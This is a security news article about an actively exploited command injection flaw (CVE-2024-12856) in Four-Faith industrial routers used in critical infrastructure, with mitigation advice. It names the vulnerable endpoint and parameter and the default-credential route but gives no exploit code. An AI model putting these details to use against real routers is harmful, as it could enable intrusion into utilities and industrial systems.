New Vulnerability Exploited in Four-Faith Routers

A high-severity command injection vulnerability is currently being exploited by malicious actors targeting Four-Faith industrial routers, which are manufactured in China. This security flaw has raised alarms given its potential to compromise a significant number of devices.

Identified as CVE-2024-12856, the vulnerability affects the F3x24 and F3x36 router models. It permits remote command execution due to the routers’ default credentials, a situation that could result in the compromise of thousands of installations, as reported by cybersecurity firm VulnCheck.

The primary users of these routers span various industries, including industrial automation, manufacturing plants, power grids, renewable energy, water utilities, and transportation, where they enable remote monitoring and control of critical infrastructure. Vulnerabilities in such equipment not only expose these sectors to risks but also pose broader threats to operational integrity.

VulnCheck identified the security issue as having a CVSS score of 7.2, indicating a considerable risk. The vulnerability is rooted in the /apply.cgi endpoint, where the adj_time_year parameter can be exploited. Attackers are leveraging default login credentials to bypass authentication, significantly heightening the vulnerability of unpatched systems.

According to research, around 15,000 internet-facing devices are vulnerable due to this issue. Exploitation could lead to reverse shell execution, giving attackers unauthorized access and control over these routers. An active campaign exploiting this vulnerability has been traced back to IP address 178.215.238.91, suggesting that the threat is not only real but also widespread.

Moreover, VulnCheck has noted connections between this current campaign and previous exploitation attempts, including common user-agent strings observed in November. To counter the threat, they have developed a Suricata rule to identify suspicious HTTP POST requests that could indicate exploitation attempts, allowing organizations to better defend against such attacks.

Four-Faith was informed of this vulnerability on December 20, under a responsible disclosure agreement, but details regarding any patches or firmware updates remain unclear. Researchers recommend that users of affected router models take immediate action to change default credentials, reduce network exposure, and closely monitor device activity to mitigate potential risks.

This situation exemplifies how adversaries can use basic tactics such as initial access via default credentials and privilege escalation through command injection to exploit vulnerabilities. It serves as a reminder for businesses to continually assess their cybersecurity posture, particularly regarding operational technology that supports critical infrastructure.